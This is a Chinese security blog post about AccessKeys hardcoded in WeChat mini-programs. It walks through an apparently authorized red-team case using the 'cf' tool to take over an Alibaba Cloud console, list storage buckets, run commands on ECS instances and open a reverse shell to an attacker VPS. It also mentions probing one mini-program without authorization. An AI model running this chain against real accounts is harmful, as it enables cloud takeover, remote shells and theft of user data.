微信小程序漏洞之accesskey泄露

最新推荐文章于 2025-01-11 22:24:16 发布
原创 最新推荐文章于 2025-01-11 22:24:16 发布
· 2.7k 阅读 · 1 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#微信小程序 #小程序 #乌鸦安全 #渗透测试 #攻防演练 #小程序逆向

更新时间:2023年09月08日09:42:52
在这里插入图片描述

1. Accesskey泄露漏洞

这篇文章里面都是以我个人的视角来进行的,因为一些原因,中间删了一些东西,肯定有很多不正确的地方,希望大家能理解,也能指正其中的错误。

在以前文章里面,我们一起学习过mac下新版微信小程序反编译学习https://mp.weixin.qq.com/s/T_grOQsC7lPgXWSK2qddGw
通过反编译,来寻找一些漏洞,今天来学习下小程序里面的硬编码漏洞,其实硬编码漏洞,在这里指的是一些osskeyoss存储桶账号密码信息等写死在了小程序里面,通过反编译可以直接找到这些信息。

Accesskey就是密钥,可以直接理解为账号密码信息,一般由AccessKeySecretOSSAccessKeyId组成,可以通过诸多工具登录云服务器。

关键字:ossaccesskey

这种泄露,目前我反编译过很多小程序里面,也只遇到过几次而已(可能与我接到的需求不同有关),当小程序反编译之后,可以在里面全局搜索关键字,然后看下。

这种漏洞很简单,其实无论是小程序还是app,都是硬编码导致的漏洞。

本文仅对mac版较新的3.8.1版本的微信展开,不对其他环境负责。
本文的操作均是在有授权的情况下进行的。

2. AccessKey泄露案例-某电力行业

在某次攻防演练中,通过信息搜集到某电力行业存在商业小程序,于是通过反编译该小程序,进行快速打点,在这里直接搜到了泄露的Accesskey信息:

通过该信息直接在cf工具上进行配置,查看当前权限:

./cf alibaba perm

在这里插入图片描述

获取其中的存储桶信息:

./cf alibaba oss ls

在这里插入图片描述

直接看下多少个桶:

./cf alibaba oss ls -n 100

在这里插入图片描述

利用命令接管账号权限:(此命令执行之后,阿里云会给账户所有者发送短信和邮件进行提醒)

./cf alibaba console

image.png

列出当前的ecs资源:

./cf alibaba ecs ls

在这里插入图片描述

列出ecs之后,执行命令,尝试执行命令:

./cf alibaba ecs exec -b

在这里插入图片描述

反弹shell看下:

./cf alibaba ecs exec --lhost 攻击机vps --lport 4144 -i i-2

image.png

反弹到shell之后,通过命令寻找到了其中存在nacos服务,最终在数据库中找到10w+敏感用户数据。

3. 总结

在有授权的情况下,如果是hw的话,一般时间紧,任务重,主要是以发现有效的信息、RCE为主,而Accesskey这种一般在hw里面出现的可能性还是比较小的,但是在市面上一些其他的小程序里面找到还是相对比较容易的,比如以前看到的某成人用品店:

这个是在以前渗透的时候遇到的:

image.png

当时正在学习小程序(比较好奇哪些朋友用过),于是就对其进行了简单的分析,逆向之后就发现了不得了的东西:

在这里插入图片描述

当然,因为没有授权,在这里就点到为止了。

由access key泄露浅谈云安全
MSB_WLAQ的博客
10-14 7229
accesskey基础 什么是accesskey? 访问密钥AccessKey(AK)相当于登录密码,只是使用场景不同。AccessKey用于程序方式调用云服 务API,而登录密码用于登录控制台。如果您不需要调用API,那么就不需要创建AccessKey。 accessky创建步骤: 使用云账号登录RAM控制台。 在左侧导航栏的人员管理菜单下,单击用户。 在用户登录名称/显示名称列表下,单击目标RAM用户名称。 在用户AccessKey区域下,单击创建AccessKey。 t.
基于微信小程序得书籍销售系统-毕业设计-附源码
最新发布
m0_57697515的博客
01-25 853
B/S结构是目前使用最多的结构模式,它可以使得系统的开发更加的简单,好操作,而且还可以对其进行维护。使用该结构时只需要在计算机中安装数据库,和一些很常用的浏览器就可以了。浏览器就会与数据库进行信息的连接,可以实现很多的功能,B/S结构是可以直接进行使用的,而且B/S结构在使用中极大的减少了工作的维护。基于B/S的软件,所有的数据库之间都是相互独立的,因此是非常安全的。因为基于B/S结构可以清楚的看到系统正在处理的业务,并且能够及时的让管理人员做出决策,这样就可以避免企业的损失。
记一次小程序简单又坎坷的key泄露复现
Aa2428259602的博客
12-07 1395
key泄露
安全课堂|关于小程序session_key泄露漏洞官方
mingyqf的博客
09-24 2727
为了保证数据安全,微信会对用户数据进行加密传输处理,所以小程序在获取微信侧提供的用户数据(如手机号)时,就需要进行相应的解密,这就会涉及到session_key,具体流程可参考。
【云安全】云服务-AccessKey泄露
仇辉攻防的博客
01-11 1221
资源滥用:攻击者可以使用泄露AccessKey创建或删除云资源,执行消耗大量资源的操作,导致用户的云服务账号被频繁使用或资源被滥用,引发费用增加等问题。可溯源攻击:通过泄露AccessKey,攻击者可以获取到用户的云服务账号和相关信息,进而可能对用户发起更加有针对性的攻击,如社会工程学攻击、钓鱼网站等。身份冒充:攻击者可以使用泄露AccessKey冒充用户身份,进行未经授权的操作,例如发送恶意邮件、发起网络攻击等,对用户和其他人员造成损害。4、设置我们获取到的AK和SK,run命令执行利用。
一次OSS Accesskey泄露记录
weixin_59047731的博客
04-23 1411
渗透千万条,安全第一条。操作不规范,亲人两行泪。
实战 | 云服务器accessKey泄露实战利用
2301_80127209的博客
03-22 2721
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。免费领取安全学习资料包!帮助你在面试中脱颖而出。
微信小程序登录注册常见问题及解决】:快速定位与修复漏洞
微信小程序作为一种便捷的移动应用形式,其登录注册机制是用户使用服务的首要步骤,对用户体验和数据安全起着关键作用。本文对微信小程序的登录注册机制进行了全面的概述和分析,详细探讨了身份验证的基础、安全机制...
记某大学校园平台关于小程序AppSecret密钥泄露漏洞
人若无名,便可专心练剑
10-26 2253
这次给师傅们分享的文章是关于小程序AppSecret密钥泄露导致的相关漏洞,这个也是在挖掘EDUSRC漏洞的时候关注的一个知识点,蛮多师傅对于这个漏洞还是比较陌生的,AppSecret是小程序密钥,然后我们可以通过AppSecret获取access_token值,然后执行一些危害操作,如接口调用凭证、用户信息、用户使用数据等,造成了极大的安全风险。
PHP基于微信小程序的打车平台-计算机毕业设计源码78689
07-16 1030
本文介绍的是基于PHP开发的打车平台小程序。该系统旨在为用户提供一个便捷、高效的平台,以实现网约车的打车功能。随着社交媒体和互联网的普及,网约车已成为日常交通中常见的形式。然而,传统的打车方式存在不方便、不及时等问题。微信小程序的打车平台旨在为用户提供一个简单、高效、便捷的体验,它不仅要求用户清晰地查看所需信息,而且还要求界面设计精美,使得功能与页面完美融合,从而提升系统的可操作性。因此,我们需要深入研究信息内容,并利用技术手段来完善打车平台。通过对微信小程序的打车平台进行深入研究,我们借鉴了现有的成熟技术
微信小程序登录实战指南:Python后端最佳实践揭秘
微信小程序是目前流行的轻量级应用程序,它们提供了一种简便快捷的方式来为用户提供服务。微信小程序的登录机制,是连接用户与服务的桥梁,也是保证安全性和用户数据隐私的基础。在本章中,我们将探讨微信小程序登录...
由OSS AccessKey泄露引发的思考
weixin_50464560的博客
10-01 2416
转载至https://www.cnblogs.com/xiaozi/p/11767841.html 什么是OSS? 对象存储服务(Object Storage Service,OSS)是一种海量、安全、低成本、高可靠的云存储服务,适合存放任意类型的文件。容量和处理能力弹性扩展,多种存储类型供选择,全面优化存储成本。 什么是AccessKeyAccessKey包括AccessKeyID和AcessKeySecret两部分,AccessKeyID用于标识用户,AcessKeySecret用于验证用户的密钥
云主机秘钥泄露及利用
技术超强的网络安全平台
08-02 2601
云平台作为降低企业资源成本的工具,在当今各大公司系统部署场景内已经成为不可或缺的重要组成部分,并且由于各类应用程序需要与其他内外部服务或程序进行通讯而大量使用凭证或密钥,因此在漏洞挖掘过程中经常会遇到一类漏洞:云主机秘钥泄露。此漏洞使攻击者接管云服务器的权限,对内部敏感信息查看或者删除等操作。此篇文章围绕如何发现秘钥泄露、拿到秘钥后如何利用展开。云主机通过使用AccessKey Id / Secret Access Key加密的方法来验证某个请求的发送者身份。Access Key。
云上攻防-云服务篇&对象存储&Bucket桶&任意上传&域名接管&AccessKey泄漏
SuperherRo的博客
02-29 2502
1、云服务-对象存储-权限配置不当 2、云服务-对象存储-域名解析接管 3、云服务-对象存储-AccessKey泄漏
安全课堂|关于小程序AppSecret密钥泄露漏洞官方
mingyqf的博客
09-24 3903
AppSecret是小程序的唯一凭证密钥,也是获取小程序全局唯一后台接口调用凭证(
关于小程序session_key漏洞问题的解决2022-12-01
qq_38220334的博客
12-04 3061
下面是官网的提示信息链接: 问题复现:现在是session_key暴漏在返回的参数中 修改后,从后端返回的参数如下;只有手机号码和appid,已经把session_key去掉了 原来获取session_key的方法 上面的code(this.data.loginCode,)是从下面的方法中获取的 上面的这种方式,会把session_key暴漏在浏览器上面,所以下面是优化的方法,我们不在后端传session_key了,调用新的接口,这个接口中会返回手机号码和appid 现在获取appid和phone的方法,
认识漏洞-微信小程序session_key泄漏、Spring Boot Actuator未授权访问漏洞
Boom!脑洞大爆炸的博客
12-17 477
认识漏洞-微信小程序session_key泄漏、Spring Boot Actuator未授权访问漏洞
微信小程序,获取AccessToken、openID ,带API
楠沐.的博客
05-27 1888
首先是获取AccessToken 话不多说 直接上图 调用API发起GET请求,直接上图
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值